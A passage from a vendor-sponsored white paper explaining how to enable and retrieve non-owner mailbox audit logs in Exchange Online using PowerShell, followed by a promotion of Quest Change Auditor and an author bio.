·         Is there any delegate access? If so, turn on auditing. This way, you have an audit trail of every time the delegate accesses the owner’s mailbox and what was done.

·         Does the mailbox contain sensitive data? Mailboxes that are owned by users who regularly send and receive financials, intellectual property, legal documents, and so on might be prime targets for insider activity. Even when no delegates are assigned to a mailbox that contains sensitive data, enable auditing proactively so that you have an audit trail of any and all access to the mailbox.


Unlike admin auditing, which is an organizational-wide audit setting, non-owner mailbox auditing is enabled on a per-mailbox basis. Audit log entries are retained, by default, for 90 days—a value that can be customized.

You can enable non-owner mailbox auditing at three levels, each with specific audited actions:

  • Admin. This level audits actions by admins who have not been granted delegate permissions to a mailbox.
  • Delegate. Anyone who is assigned permissions or given Send on Behalf of permissions is considered a delegate.
  • Owner. Auditing for the mailbox owner is typically disabled, as it isn’t relevant to audits. In addition, enabling owner auditing generates a great deal of information. Non-owner access is generally infrequent and limited in scope (e.g., an assistant sending out calendar invites for their boss, someone in IT finding a specific message), whereas audits of owner access encompass every email created, read, filed, deleted, and so on.






















































Enabling Non-Owner Mailbox Auditing

Like admin auditing, non-owner mailbox auditing is enabled by using PowerShell via the Set-Mailbox cmdlet. As previously mentioned, this action is accomplished on a per-mailbox basis and requires that you specify which level or levels of auditing (admin, delegate, or owner) you want to enable:


Set-Mailbox –Identity “John Smith” –AuditDelegate SendOnBehalf,FolderBind –AuditEnabled $true


AuditDelegate in this command. This parameter enables mailbox auditing, but only for delegate access and only for the specified actions. You either need to perform this command a second time to configure auditing of Administrator access, specifying which actions should be audited (as shown in the following command), or include the AuditAdmin parameters in the same execution of this cmdlet:


Set-Mailbox –Identity “John Smith” –AuditAdmin Copy,MessageBind

-AuditEnabled $true


Organizations that audit the mailbox access of every user must enable mailbox auditing for new users. This approach might require a bit more PowerShell scripting, to continuously perform a search for a user account with a recent create date and to run the previous commands against that account.

Quest Insight – Which Actions Should You Audit?

You should enable both admin and delegate access to help ensure that any (and every) instance of non-owner access is recorded. Auditing of most of the previously mentioned admin actions is automatic whenever auditing is enabled for a given mailbox, with the exception of MessageBind (which for all intents and purposes can be considered a reading of a message) and Copy. Auditing of these actions needs to be enabled separately (as explained earlier). Also note that whenever an admin is assigned Full Access to a mailbox, that admin is considered a delegate user and is audited as such.


Like admin, some delegate actions (i.e., Create, HardDelete, SendAs, SoftDelete, and Update) are also automatically audited. Therefore, you need to enable auditing for any other actions that you want to log.


Some organizations use solutions that scan mailboxes for compliance, identification of sensitive data, categorization for legal purposes, and so on. Such solutions might trigger bogus events because of their access of a given mailbox. In such situation, you can use the Set-MailboxAuditBypassAssociation cmdlet to bypass auditing for a specific, trusted account.

Now that you have enabled mailbox auditing, how do you get your audit logs out?

This process is a bit complicated, as it depends on how many mailboxes you need to audit, how much detail you want to obtain, and whether you need the raw audit data or a report format. You have a few options:

  • Synchronously via PowerShell. You can use the Search-MailboxAuditLog cmdlet to search a single mailbox’s audit log entries. The cmdlet displays search results in the Exchange Management Shell window and provides limited detail that might not meet your auditing requirements.
  • Asynchronously via PowerShell. You can use the New-MailboxAuditLogSearch cmdlet to search through the audit logs of one or more mailboxes, with the results sent to a specified email address as an XML file. If you want to pull audit data into your SIEM solution, use this option. Should your cmdlet query criteria generate too many results, then the received email simply informs you that the query was a failure. You’ll need to further hone the results to a smaller data set, potentially requiring the combination of multiple XML files to represent a complete audit of all actions. Be aware that Exchange 2016 allows only 10 searches of this type per mailbox within a 24-hour period.Exchange admin center reports. From within the Exchange admin center’s reports section (not the Office 365 Security & Compliance portal), you can run a Search for mailboxes accessed by non-owners report. However, you cannot export this data.
  • Office 365 Management Activity API. Microsoft provides a RESTful API to access audit data. This API requires some significant development, so it might not be an option for most organizations. However this is the only viable option for getting your all your audit data out of the cloud and into a compliance-ready secure archival and monitoring platform. To be compliant you have to use this API.

It can take up to 24 hours for events to show up in the unified audit log where they are stored, so you should expect some latency around audit requests. Also note that none of these options make it truly easy to obtain the information you need. Some don’t provide the necessary granularity, whereas others require that granularity if they are to be valuable. Think of each option more as another tool to access raw data than as an auditing solution designed to provide you with correlated, formatted intelligence around performed actions.

Meeting Compliance and Security Requirements

The good news is that Office 365 does capture the audit data you need. But compliance and security require more than just capture audit data. You have to protect, archive and most importantly monitor that audit data. And monitoring means correlating with other security information from your environment so that you can actually detect attacks and misuse.

So the bad news is that if there is no way you can meet enterprise compliance and security requirements with the out of box functionality of Office 365. You must either write your own application to access the Management Activity API or exploit a solution that does that for you.

Enter Quest Change Auditor. Change Auditor now integrates audit logs from Exchange Online with the rest of the activity Change Auditor collects, normalizes and monitors from all over your network. The latest version of Change Auditor implements the Management Activity API and other APIs from Office 365 to automatically collect Exchange Online mailbox and administrator audit logs. Change Auditor brings to Exchange Online the same Who, What, When and Where capability ChangeAuditor is famous for. And the cool thing is now you see what a given user like Bob is doing both in the cloud and on your internal network because ChangeAuditor already monitors

  • Active Directory
  • SharePoint
  • Windows
  • SQL Server
  • Network Attached Storage
  • Lync
  • VMware

You can’t be compliance without monitoring your environment and that fact doesn’t go away when you move to the cloud. Office 365 captures the activity required by enterprises for compliance but it’s up to you after that. Change Auditor solves this issue and puts cloud activity and on-prem events on the same pane of glass.


About Randy Franklin Smith

Randy Franklin Smith is an internationally recognized expert on the security and control of Windows and AD security. Randy publishes and wrote The Windows Server 2008 Security Log Revealed—the only book devoted to the Windows security log. Randy is the creator of LOGbinder software, which makes cryptic application logs understandable and available to log-management and SIEM solutions. As a Certified Information Systems Auditor, Randy performs security reviews for clients ranging from small, privately held firms to Fortune 500 companies, national, and international organizations. Randy is also a Microsoft Security Most Valuable Professional.


Monterey Technology Group, Inc. and Dell Software make no claim that use of this white paper will assure a successful outcome. Readers use all information within this document at their own risk.

[L1] Osterman Research, 2015

email this digg reddit dzone
comments (0)references (0)

Auditing Privileged Operations and Mailbox Access in Office 365 Exchange Online
5 Indicators of Endpoint Evil
Severing the Horizontal Kill Chain: The Role of Micro-Segmentation in Your Virtualization Infrastructure
Anatomy of a Hack Disrupted: How one of SIEM’s out-of-the-box rules caught an intrusion and beyond

previous | next

powered by Bloget™


Recent Blogs


Upcoming Webinars
    Additional Resources